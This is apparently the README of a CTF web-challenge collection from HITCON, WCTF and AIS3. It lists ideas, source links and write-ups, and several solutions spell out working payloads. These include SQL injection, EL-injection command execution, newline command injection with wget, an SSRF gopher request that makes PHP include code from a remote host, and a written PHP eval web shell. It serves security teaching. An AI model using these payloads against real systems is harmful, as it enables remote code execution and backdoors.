-showcerts -connect 1.2.3.4:443 \u003c /dev/null | openssl x509 -text | grep -A 1 \"Subject Alternative Name\"\n...\ndepth=0 C = TW, ST = Some-State, O = Internet Widgits Pty Ltd, CN = very-secret-area-for-ctf.orange.tw, emailAddress = orange@chroot.org\n...\n# get the flag\n$ curl -k -H \"host: very-secret-area-for-ctf.orange.tw\" https://1.2.3.4/\n```\n\n#### Write Ups\n\n* [HITCON 2016](https://dinhbaoluciusteam.wordpress.com/2016/10/10/hitcon-2016/)  \n* [HITCON CTF 2016: %%% (Web) Write-up](http://icheernoom.blogspot.tw/2016/10/hitcon-ctf-2016-web-write-up.html)  \n* [\\[HITCON 2016\\] \\[WEB 100 - %%%\\] WRITE UP](https://0x90r00t.com/2016/10/10/hitcon-2016-web-100-write-up/)  \n* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)  \n\n\n\n## **Leaking**\n\nDifficulty: **★★**  \nSolved: **43 / 1024**  \nTag: **WhiteBox**, **JavaScript**, **NodeJS**  \n\n#### Idea\n\n* Break the JavaScript sandbox\n* Use NodeJS `Buffer(int)` to steal uninitialized memory  \n* [Node.js Buffer knows everything](https://github.com/ChALkeR/notes/blob/master/Buffer-knows-everything.md)\n\n#### Source Code\n\n* [here](hitcon-ctf-2016/leaking)\n\n#### Solution\n\n```bash\n$ while true; do curl 'http://1.2.3.4/?data=Buffer(1e4)' | grep -a hitcon; done;\n```\n\n#### Write Ups\n\n* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#leaking)  \n* [HITCON 2016 web summary](http://0x48.pw/2016/10/14/0x24/)  \n* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)\n\n\n\n## **BabyTrick**\n\nDifficulty: **★★★**  \nSolved: **24 / 1024**  \nTag: **WhiteBox**, **PHP**, **MySQL**, **SQL Injection**, **Unserialize**\n\n#### Idea\n\n* [Create an Unexpected Object and Don't Invoke \\_\\_wakeup() in Deserialization](https://bugs.php.net/bug.php?id=72663)\n* [SugarCRM v6.5.23 PHP deserialization object injection vulnerability](http://blog.knownsec.com/2016/09/sugarcrm-v6-5-23-php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AF%B9%E8%B1%A1%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/)\n* MySQL UTF-8 collation - 
`SELECT 'Ä'='a'` is true\n\n#### Source Code\n\n* [here](hitcon-ctf-2016/babytrick)\n\n#### Solution\n\n```bash\n# get the password\ncurl http://1.2.3.4/\n?data=O:6:\"HITCON\":3:{s:14:\"%00HITCON%00method\";s:4:\"show\";s:12:\"%00HITCON%00args\";a:1:{i:0;s:39:\"'union%20select%201,2,password%20from%20users%23\";}}\n\n# get the flag\ncurl http://1.2.3.4/\n?data=O:6:\"HITCON\":2:{s:14:\"%00HITCON%00method\";s:5:\"login\";s:12:\"%00HITCON%00args\";a:2:{i:0;s:7:\"orÄnge\";i:1;s:13:\"babytrick1234\";}}\n```\n\n#### Write Ups\n\n* [Hitcon 2016 – Baby Trick](http://0xecute.com/index.php/2016/10/10/baby-trick/)\n* [Hello HitCon 2016 CTF](https://ctfs.ghost.io/hello-hitcon-2016-ctf/#babytrick)  \n* [hitcon2016 web writeup](http://lorexxar.cn/2016/10/10/hitcon2016/)\n\n\n\n\n## **Angry Boy**\n\nDifficulty: **★★☆**  \nSolved: **43 / 1024**  \nTag: **GrayBox**, **Java**\n\n#### Idea\n\n* `new String(new byte[] {1, -1, 1, -1})` will output `01EFBFBD01EFBFBD`, not `01FF01FF`\n* [When ‘EFBFBD’ And Friends Come Knocking: Observations Of Byte Array To String Conversions](https://blog.gdssecurity.com/labs/2015/2/18/when-efbfbd-and-friends-come-knocking-observations-of-byte-a.html)\n\n#### Source Code\n\n* [here](hitcon-ctf-2016/angry%20boy)\n\n#### Solution\n\n* [exploit.py](hitcon-ctf-2016/angry%20boy/exploit.py)\n* [decrypt.py](hitcon-ctf-2016/angry%20boy/decrypt.py)\n\n#### Write Ups\n\n* [Angry Boy - Web 300 Problem](https://github.com/pwning/public-writeup/tree/master/hitcon2016/web300-angryboy)\n\n\n## **Angry Seam**\n\nDifficulty: **★★★★**  \nSolved: **4 / 1024**  \nTag: **GrayBox**, **Java**, **Seam Framework**, **CSS RPO**, **EL Injection**, **Java Deserialization**  \n\n#### Idea\n\n* CSS Relative Path Overwrite  \n* Built-in redirection parameter `actionOutcome`  \n* [RPO Gadgets](http://blog.innerht.ml/rpo-gadgets/)  \n* [CVE-2010-1871: JBoss Seam Framework remote code execution](http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html)  \n\n\n#### Source Code\n\n* 
[here](hitcon-ctf-2016/angry%20seam)\n\n#### Solution\n\n\u003cbr\u003e\n\n**P.s.** I made this challenge because once when I tried to review the code of the Seam Framework, I found some 0-days and I thought it must have more. So I threw out a brick to attract jade. And the result was more than I expected :P  \n\n\u003cbr\u003e\n\n**Intended solution**  \n\n* Register an account  \n   ```\n   username: `AAAAAA`    \n   password: `AAAAAA`  \n   realname: `{/*';*/}%0a@import'http://orange.tw/?`  \n   ```\n\n* Report URL  \n    ```\n    http://1.2.3.4:8080/angryseam/profile.seam?actionOutcom\u003ee=/profile.seam?username%3dAAAAAA\n    ```\n\n\u003cbr\u003e\n\n**Unintended solution**  \n\n* Register an account  \n* Update the description to  \n* Login and access   \n\n```\n/?x=#{expressions.instance().createValueExpression(request.getHeader('cmd')).getValue()}\n```\n\n```\nGET /angryseam/template.seam?actionMethod=template.xhtml:util.escape(sessionScope['user'].getDescription()) HTTP/1.1\nhost: 1.2.3.4\ncmd: #{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[15].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),request.getHeader('ccc'))}\nccc: ls -alh\n...\n```\n\n\n**Unintended solution**  \n\n* CVE-2013-2165 Java deserialization vulnerability\n\n\u003cbr\u003e\n\n**Unintended solution**  \n\n* SESSION manipulation... 
seam SUCKS  \n\n#### Write Ups\n\n* [Web500 Hitconctf 2016 and exploit CVE-2013-2165](http://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/)\n* [Angry Seam (500 pts)](https://github.com/Blaklis/write-ups/tree/master/hitcon)\n\n## **Babyfirst**\n\nSolved: **33 / 969**  \nDifficulty: **★★**  \nTag: **WhiteBox**, **PHP**, **Command Injection**  \n\n#### Idea\n\n* Use `NewLine` to bypass the regular expression check  \n* Command injection with only alphanumeric characters  \n\n#### Source Code\n\n* [here](hitcon-ctf-2015/babyfirst)  \n\n```php\n\u003c?php\n    highlight_file(__FILE__);\n\n    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];\n    if ( !file_exists($dir) )\n        mkdir($dir);\n    chdir($dir);\n\n    $args = $_GET['args'];\n    for ( $i=0; $i\u003ccount($args); $i++ ){\n        if ( !preg_match('/^\\w+$/', $args[$i]) )\n            exit();\n    }\n\n    exec(\"/bin/orange \" . implode(\" \", $args));\n?\u003e\n```\n\n\n#### Solution\n\n```text\nhttp://localhost/\n?args[0]=x%0a\n\u0026args[1]=mkdir\n\u0026args[2]=orange%0a\n\u0026args[3]=cd\n\u0026args[4]=orange%0a\n\u0026args[5]=wget\n\u0026args[6]=846465263%0a\n\nhttp://localhost/\n?args[0]=x%0a\n\u0026args[1]=tar\n\u0026args[2]=cvf\n\u0026args[3]=aa\n\u0026args[4]=orange%0a\n\u0026args[5]=php\n\u0026args[6]=aa\n```\n\nThere are also lots of creative solutions; you can check the write-ups below.  \n\n\n#### Write Ups\n\n* [babyfirst (web 100)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web100-babyfirst/writeup.md)  \n* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)  \n* [HITCON 2015 Quals: Babyexploit](https://kt.pe/blog/2015/10/hitcon-2015-quals-babyexploit/)  \n* [Babyfirst (web, 100p, ?? 
solves)](https://github.com/p4-team/ctf/tree/master/2015-10-18-hitcon/web_100_babyfirst#eng-version)  \n\n\n\n## **nanana**\n\nDifficulty: **★★★**  \nSolved: **18 / 969**  \nTag: **GrayBox**, **C**, **PWN**  \n\n#### Idea\n* Pwn without library  \n* Format String without output  \n* Bypass Stack Guard by using overflow `ARGV[1]`  \n\n#### Source Code\n\n* [here](hitcon-ctf-2015/nanana/)  \n\n#### Solution  \n\n* [exploit.py](hitcon-ctf-2015/nanana/exploit.py)  \n\n#### Write Ups\n\n* [nanana (pwn, web 200)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web200-nanana/writeup.md)  \n* [HITCON 2015 Quals: Nanana](https://kt.pe/blog/2015/10/hitcon-2015-quals-nanana/)  \n* [Pwning (sometimes) with style - Dragons’ notes on CTFs](http://j00ru.vexillium.org/blog/24_03_15/dragons_ctf.pdf)  \n\n\n## **Giraffe's Coffee**\n\nDifficulty: **★★★☆**  \nSolved: **16 / 969**  \nTag: **WhiteBox**, **PHP**  \n\n#### Idea\n* Break PHP PRNG  \n* Break shared PRNG STATE in Apache Prefork mode  \n\n#### Source Code\n\n* [here](hitcon-ctf-2015/giraffe's-coffee)  \n\n#### Solution  \n\n    TBD\n\n#### Write Ups\n\n* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)\n* [Giraffe's Coffee - Web 300 Problem - Writeup by Robert Xiao (@nneonneo)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web300-giraffes-coffee/readme.md)\n* [HITCON 2015 WEB 300](https://docs.google.com/document/d/1NlCF4jykgwuUMkr0I8HjbLRUKNAGf6jzRiI2D9TyumA/edit)\n\n\n## **lalala**\n\nDifficulty: **★★★☆**  \nSolved: **2 / 969**  \nTag: **BlackBox**, **PHP**, **SSRF**  \n\n#### Idea\n\n* Bypass SSRF restriction with 302 redirect  \n* Exploit FASTCGI protocol by using GOPHER  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2015/lalala)  \n\n#### Solution    \n\n```php\n\u003c?php\nheader( \"Location: 
gopher://127.0.0.1:9000/x%01%01Zh%00%08%00%00%00%01%00%00%00%00%00%00%01%04Zh%00%86%00%00%0E%03REQUEST_METHODGET%0F%0ASCRIPT_FILENAME/www/a.php%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%09%26PHP_VALUEauto_prepend_file%20%3D%20http%3A//orange.tw/x%01%04Zh%00%00%00%00%01%05Zh%00%00%00%00\" );\n```\n\n#### Write Ups  \n\n* [HITCON CTF 2015 Web 100 Web 300 Writeup](http://5alt.me/posts/2015/10/HITCON%20CTF%202015%20Web%20100%20Web%20300%20Writeup.html)  \n* [Hitcon 2015 lalala web400 task](https://docs.google.com/document/d/1eALKwCyogM5Mw_D4qWe48X-PAGZw_2vT82aP0EPIr-8/mobilebasic?pli=1)  \n\n\n## **Use-After-FLEE**  \n\nSolved: **1 / 969**  \nDifficulty: **★★★★☆**  \nTag: **WhiteBox**, **PHP**, **UAF**, **PWN**  \n\n#### Idea\n\n* Bypass open_basedir  \n* Bypass disable_functions  \n* PHP use-after-free exploit writing  \n* Bypass full protection (DEP / ASLR / PIE / FULL RELRO)  \n* [Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList](https://github.com/80vul/phpcodz/blob/master/research/pch-034.md)  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2015/use-after-flee)  \n\n#### Solution    \n\n    TBD\n\n#### Write Ups\n\n* [Use-After-FLEE (pwn, web 500)](https://github.com/pwning/public-writeup/blob/master/hitcon2015/web500-use-after-flee/writeup.md)\n\n\n## **PUSHIN CAT**\n\nSolved: **8 / 1020**  \nDifficulty: **★★**  \nPlatform:  **BlackBox**, **PHP**, **H2**, **SQL Injection**  \n\n#### Idea  \n\n* SQL Injection on H2 Database  \n* Execute Code by using H2 SQL Injection  \n\n#### Source Code\n\n* [here](hitcon-ctf-2014/pushincat)    \n\n#### Solution  \n\n    TBD\n\n#### Write Ups\n\n* [HITCON CTF 2014: PUSHIN CAT](https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/pushin-cat)\n* [HITCON CTF 2014 - PUSHIN CAT (H2 DB Insert SQL Injection)](https://www.youtube.com/watch?v=KNs5ZZo31P8)\n* [HITCON CTF 2014](http://mage-ctf-writeup.blogspot.tw/2014/08/hitcon-ctf-2014.html)\n\n\n## **PY4H4SHER**\n\nSolved: **30 / 
1020**  \nDifficulty: **★★☆**  \nTag: **WhiteBox**, **Python**, **Collision**, **HPP**  \n\n#### Idea\n\n* Python CGI HTTP Pollution  \n* MySQL old_password hash collisions  \n* [PBKDF2+HMAC hash collisions explained](https://mathiasbynens.be/notes/pbkdf2-hmac)  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2014/py4h4sher)  \n\n#### Solution    \n\n    TBD  \n\n#### Write Ups  \n\n* [HITCON CTF 2014: PY4H4SHER](https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/py4h4sher)  \n* [HITCON CTF 2014: PY4H4SHER WRITEUP](http://blog.st3phn.com/2014/08/hitcon-ctf-2014-py4h4sher-writeup.html)  \n* [py4h4sher_solution.py](http://pastebin.com/DCbJ0qzi)  \n* [HITCON CTF 2014](http://mage-ctf-writeup.blogspot.tw/2014/08/hitcon-ctf-2014.html)  \n\n\n## **LEENODE**  \n\nSolved: **2 / 1020**  \nDifficulty: **★★★**  \nTag: **BlackBox**, **ColdFusion**, **Apache**  \n\n#### Idea  \n\n* Multilayered architecture vulnerability  \n* Double Encoding  \n\n#### Source Code  \n\n* [here](hitcon-ctf-2014/leenode)  \n\n#### Solution  \n\n```bash\n# get password\n$ curl http://1.2.3.4/admin%252f%252ehtpasswd%2500.cfm\n\n# get flag\n$ curl http://1.2.3.4/admin/thefl4g.txt \n\n```\n\n#### Write Ups  \n\n* [HITCON CTF 2014: LEENODE](https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/leenode)  \n* [(web) LEENODE [250]](http://cdepillabout.github.io/ctf/2014/hitcon/leenode/writeup.html)  \n* [CTF/Writeup/HITCON2014/LEENODE](https://wiki.mma.club.uec.ac.jp/CTF/Writeup/HITCON2014/LEENODE)  \n\n\n## **BlackBox**\n\nSolved: **0 / 12**  \nDifficulty: **★★★★**  \nTag: **GrayBox**, **PHP**, **JAVA**, **mod_jk**, **H2**, **SQL Injection**, **WAF**  \n\n#### Idea  \n\n* Multilayered architecture vulnerability  \n* Default and up to date mod_jk leads to directory traversal  \n* Bypass WAF by incorrect usage of BASE64 and URLENCODE  \n* SQL Injection on H2 Database  \n* Execute Code by using H2 SQL Injection  \n\n#### Source Code  \n\n* [here](wctf-2016/BlackBox)  \n\n#### 
Solution  \n\n* Get source code  \n   ```text\n   http://1.2.3.4/login/..;/\n   ```\n\n* Review code and find a way to bypass WAF  \n   ```bash\n   $ curl \"http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,version(),null--\"\n   $ curl \"http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_read('/etc/apache2/sites-enabled/000-default.conf'),null--\"\n   ```  \n\n* Write shell  \n    ```bash\n    $ curl \"http://1.2.3.4/news/?id=1~~~~' and 1=2 union select null,null,file_write('3c3f706870206576616c28245f504f53545b6363635d293b3f3e', '/www/write_shell_here_=P/.a.php'),null--\"\n    $ curl \"http://1.2.3.4/write_shell_here_=P/.a.php\" -d 'phpinfo();'\n    ```\n\n#### Write Ups  \n\n    TBD\n\n\n\n## **SQLPWN**  \n\nSolved: **0 / ??**  \nDifficulty: **★★★**  \nTag: **WhiteBox**, **PHP**, **SQL Injection**, **LFI**, **Race Condition**  \n\n#### Idea  \n\n* One-byte off SQL Injection  \n* Race Condition  \n* Local file inclusion with PHP session  \n\n#### Source Code  \n\n* [here](ais3-final-2015/sqlpwn)  \n\n#### Solution  \n\n* Run [exploit.py](ais3-final-2015/sqlpwn/exploit.py) to win race condition\n\n* Login and SQL Injection\n\n   ```bash\n   $ curl http://1.2.3.4/sqlpwn.php -d 'title=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\\\u0026note=, concat(0x3a3a3a3a3a3a,(select pass from users where name=0x6f72616e6765)))#'\n   ```\n\n* Local file inclusion with session\n   ```bash\n   $ curl http://1.2.3.4/sqlpwn.php?mode=admin\u0026boom=../../../../../../var/lib/php5/sess_243220\n   ```  \n\n#### Write Ups  \n\n* [AIS3 Final CTF Web Writeup (Race Condition \u0026 one-byte off SQL Injection)](http://blog.orange.tw/2015/09/ais3-final-ctf-web-writeup-race.html)  \n* [AIS3 CTF Final Web1 \u0026 Web2](https://docs.google.com/document/d/1n-8LHsxJ6o1-Pr1ISKYyopcfLoUIQcF5CcZGl7KLbPY/edit)  
\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Forangetw%2Fmy-ctf-web-challenges","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Forangetw%2Fmy-ctf-web-challenges","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Forangetw%2Fmy-ctf-web-challenges/lists"}